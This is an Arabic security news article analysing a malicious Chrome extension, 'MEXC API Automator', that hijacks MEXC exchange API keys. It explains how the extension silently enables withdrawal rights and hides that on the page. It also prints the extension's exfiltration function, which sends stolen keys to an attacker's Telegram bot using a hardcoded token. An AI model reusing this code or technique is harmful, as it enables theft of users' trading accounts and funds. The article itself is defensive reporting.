كشفت تحقيقات أمنية حديثة عن وجود إضافة خبيثة لمتصفح جوجل كروم، تُعرف باسم “MEXC API Automator”، تستهدف المستخدمين النشطين في منصة تداول العملات المشفرة MEXC، حيث تقوم بسرقة بيانات اعتماد واجهة برمجة التطبيقات (API) بشكل خفي، مما يسمح للمهاجم بالتحكم الكامل في الحسابات.
تُقدم هذه الإضافة المارقة نفسها كأداة للمساعدة في أتمتة عمليات التداول وإنشاء مفاتيح API، لكنها في الحقيقة تتيح للمحتالين السيطرة على مفاتيح API الجديدة المستخدمة في MEXC، وتحويل جلسات المستخدمين العادية إلى قنوات كاملة لسرقة الحسابات.
إضافة كروم خبيثة تشن هجوماً جديداً على مستخدمي MEXC
بدأ الهجوم من خلال إدراج الإضافة في متجر Chrome Web Store، حيث تم تقديمها كأداة شرعية توفر “سهولة إنشاء مفاتيح API مع صلاحيات التداول والسحب” لمنصة MEXC.
بمجرد تثبيتها، تنشط الإضافة عندما يقوم الضحية بفتح صفحة إدارة واجهة برمجة التطبيقات (API) الخاصة بمنصة MEXC، وهي الصفحة التي يستخدمها المستخدمون عادة لإنشاء مفاتيح لتشغيل الروبوتات وأنظمة التداول الآلي.
من هذه النقطة، يمكن للإضافة إنشاء مفاتيح ذات صلاحيات قوية، وتشغيل عمليات تداول، وتمكين عمليات السحب، مما يهدد قاعدة مستخدمين عالمية.
آلية العمل والتضليل
كشف باحثون أمنيون، بعد مراجعة الإضافة، أنها تعتبر برمجية خبيثة بالكامل، وربطوها بجهة فاعلة تحمل الاسم المستعار jorjortan142.
أظهر تحليلهم أن الكود الخاص بالإضافة يعمل فقط داخل جلسة MEXC المسجلة الدخول بالفعل، مما يعني أن سرقة كلمات المرور التقليدية ليست ضرورية.
تسلط هذه الإضافة الضوء على كيفية استغلال العلامة التجارية لمتجر Chrome Web Store لبناء الثقة.
بدلاً من سرقة كلمات المرور، تركز الإضافة على مفاتيح API الخاصة بـ MEXC التي تسمح بالتداول والسحب، وغالباً ما تبقى هذه المفاتيح فعالة لفترات طويلة، وتُعاد استخدامها في الروبوتات والنصوص البرمجية، ولا تخضع للمراقبة بنفس مستوى تسجيلات الدخول التفاعلية.
بمجرد ظهور المفتاح الجديد في نافذة التأكيد، تقوم الإضافة بالتقاطه وإعداده للإرسال إلى بنية تحتية خاصة بالبرق (Telegram) يتحكم بها المهاجم.
تفاصيل الاختراق والتضليل ووسائل إخراج البيانات
تُصنف “MEXC API Automator” كإضافة Manifest V3 لمتصفح كروم، وتقوم بحقن سكريبت محتوى واحد، وهو script.js، في نمط URL وهو *://*.mexc.com/user/openapi*.
عندما يفتح الضحية هذه الصفحة، ينتظر السكريبت تحميل الصفحة، ويتعرف على نموذج إنشاء API، ثم يقوم برمجياً باختيار جميع مربعات التحقق الخاصة بالصلاحيات، بما في ذلك خيار السحب، دون أي نقرات إضافية من المستخدم.
لخداع الضحية، تقوم الإضافة لاحقاً بتعديل أنماط الصفحة لجعل خيار السحب يبدو معطلاً، على الرغم من أنه يبقى مفعلاً على جانب الخادم.
تقوم الإضافة بإزالة الفئة “checked” من مربع التحقق الخاص بالسحب، وتخفي علامة الصح المرئية باستخدام CSS محقون، وتستخدم MutationObserver لإزالة الفئة مرة أخرى في حال استعادتها بواسطة كود MEXC الخاص.
يعتقد الضحية أن التداول فقط هو المسموح به، لكن النموذج المرسل يحمل في الواقع حقوق سحب كاملة.
عندما تعرض المنصة نافذة التأكيد التي تحتوي على مفتاح الوصول (Access Key) والمفتاح السري (Secret Key) الجديدين، يقوم السكريبت بقراءة القيمتين مباشرة من هيكل الصفحة (DOM) ويرسلهما إلى جهاز مراسلة Telegram (bot) ومعرف الدردشة (chat ID) المحددين مسبقاً في الخلفية.
إن جوهر هذا السلوك يظهر في دالة بسيطة:
function sendKeysToTelegram(apiKey, secretKey) {
const botToken = '7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I';
const chatId = '6526634583';
fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ chat_id: chatId, text: `API Key: ${apiKey}nSecret Key: ${secretKey}` })
});
}نظراً لأن الإضافة تظل ضمن ساندبوكس المتصفح، وتقرأ محتوى الصفحة فقط، وترسل البيانات عبر HTTPS العادي، فإنها تندمج مع حركة مرور الويب العادية.
بحلول الوقت الذي يلاحظ فيه الضحية عمليات تداول غريبة أو فقدان للأموال، يكون المهاجم قد قام بالفعل بتحميل المفاتيح في نصوص برمجية أو أدوات يمكنها استنزاف الحسابات دون الحاجة للمس كلمة مرور المستخدم.